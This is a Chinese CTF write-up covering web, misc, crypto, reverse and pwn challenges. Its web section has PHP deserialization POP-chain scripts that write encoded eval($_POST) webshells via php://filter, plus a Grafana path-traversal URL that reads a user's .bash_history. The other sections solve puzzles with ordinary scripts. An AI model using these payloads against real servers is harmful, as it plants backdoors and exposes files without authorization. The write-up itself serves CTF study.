文章目录
- web
- POP
- Ezlogin
- Fileupload
- History
- MISC
- 简单隐写
- 十位马
- Crypto
- Easyrsa
- 疑惑
- Reverse
- Checkin
- Pwn
- Checkin
- Angr
web
POP
脚本
<?php
class catf1ag1{
public $hzy;
public $arr;
public function __construct()
{
$this->hzy = new catf1ag2;
$this->arr = ['pputut'];
}
}
class catf1ag2{
public $file;
public $txt = '';
public function __construct(){
$this->file='php://filter/convert.base64-decode/resource=5.php';
$this->txt='PD9waHAgQGV2YWwoJF9QT1NUWycxMjMnXSk7Pz4=';
}
}
echo base64_encode(serialize(new catf1ag1));
然后连蚁剑
Ezlogin
查看robots.txt
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3这一字符串经由两次base64解码与hex得到index.php
按照此种方法对source.php加密
但是改完又跳回index.php,发现多了一个surprise,最后就猜测出来/surprise/source.php
脚本:
<?php
class A{
public $hello;
public function __construct(){
$this->hello = new B;
}
}
class B{
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = 'php://filter/write=string.rot13/resource=2.php';
$this -> text = '<?cuc riny($_CBFG[n]);';
}
}
echo urlencode(serialize(new A));
传入之后访问2.php,命令执行
Fileupload
发现include/f1ag_1s_n0t_here.php,访问后发现是文件上传点。
简单绕过后上传文件,猜测前边需要有时间戳,在uploads中发现了上传后的文件。
History
猜测到是查看命令历史。
/public/plugins/gettingstarted/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/home/grafana/.bash_history
知道了flag名称及位置,访问即可。
MISC
简单隐写
将图片放入010查看有rar文件头,在rar文件中有flag.txt,所以将后缀名改为rar
发现flag被加密,使用工具Jphswin提取出图片中的信息找到password
凯撒解密得到最终flag。
十位马
看文件头为04034B50 而zip文件头为504B0304编写脚本
运行一次后将数据放入010hex区然后再运行一次得到文件f重复之前操作得到zip
使用montage工具拼接得到
添加二维码定位扫码得flag
Crypto
Easyrsa
网上找到了原题,替换数据后,脚本直接用:
import gmpy2
import Crypto.Util.number
import sympy
d= 12344766091434434733173074189627377553017680360356962089159282442350343171988536143126785315325155784049041041740294461592715296364871912847202681353107182427067350160760722505537695351060872358780516757652343767211907987297081728669843916949983336698385141593880433674937737932158161117039734886760063825649623992179585362400642056715249145349214196969590250787495038347519927017407204272334005860911299915001920451629055970214564924913446260348649062607855669069184216149660211811217616624622378241195643396616228441026080441013816066477785035557421235574948446455413760957154157952685181318232685147981777529010093
c= 11665709552346194520404644475693304343544277312139717618599619856028953672850971126750357095315011211770308088484683204061365343120233905810281045824420833988717463919084545209896116273241788366262798828075566212041893949256528106615605492953529332060374278942243879658004499423676775019309335825331748319484916607746676069594715000075912334306124627379144493327297854542488373589404460931325101587726363963663368593838684601095345900109519178235587636259017532403848656471367893974805399463278536349688131608183835495334912159111202418065161491440462011639125641718883550113983387585871212805400726591849356527011578
e = 0x10001
# 有 c d e 我们知道e*d %([p-1)*(q-1)]= 1 则e*d-1 = k* (p-1)*(q-1)
# 可以爆破k要得到(p-1)(q-1)
#取k的范围 ed - 1是2063到2064位 、 (p-1)(q-1)是1024+1024位 则k取2**15~2**16
for i in range(1000,3000):
if e*d-1 > 2**i and e*d-1<2**(i+1):
print(i)
break
#2063
# (e*d-1)对k的模为0
# 我们还知道q是p的下一个素数 俩者大小相差不大
for k in range(2**15,2**16):
if (e*d-1) % k==0:
p = sympy.prevprime(gmpy2.iroot((e*d-1)//k,2)[0])
#通过sympy.prevprime(n)得到小于n的最大素数
#gmpy2.iroot开方函数输出的是一个元组
q = gmpy2.next_prime(p)
# print(q)
# print(p)
if (e*d-1)//k == (q-1)*(p-1):
#验证pq是否正确
break
n = q * p
m = pow(c ,d ,n )
print(Crypto.Util.number.long_to_bytes(m))
疑惑
x=’welcome_to_nine-ak_match_is_so_easy_!@!’ y=[20, 4, 24, 5, 94, 12, 2, 36 ,26, 6, 49, 11, 68, 15, 14, 114, 12, 10, 43, 14, 9 ,43 ,10, 27, 31, 31, 22, 45, 10, 48, 58, 4 ,18, 10, 38, 31, 14, 97, 92]
flag=’’
for i in range(len(x)):
flag+=chr(ord(x[i])^y[i])
print(flag)
Reverse
Checkin
先查壳
32位upx
Upx -d 报错
使用工具upxf之后再尝试脱壳
脱壳成功
题目描述位crackme且为32bit故推测位动调
动调获取关键数据后编写python脚本
运行后得flag
Pwn
Checkin
用ida64打开分析代码
需绕过atoi函数
编写脚本
Angr
Ida分析代码
依次发送0 , 2 进入system
运行得flag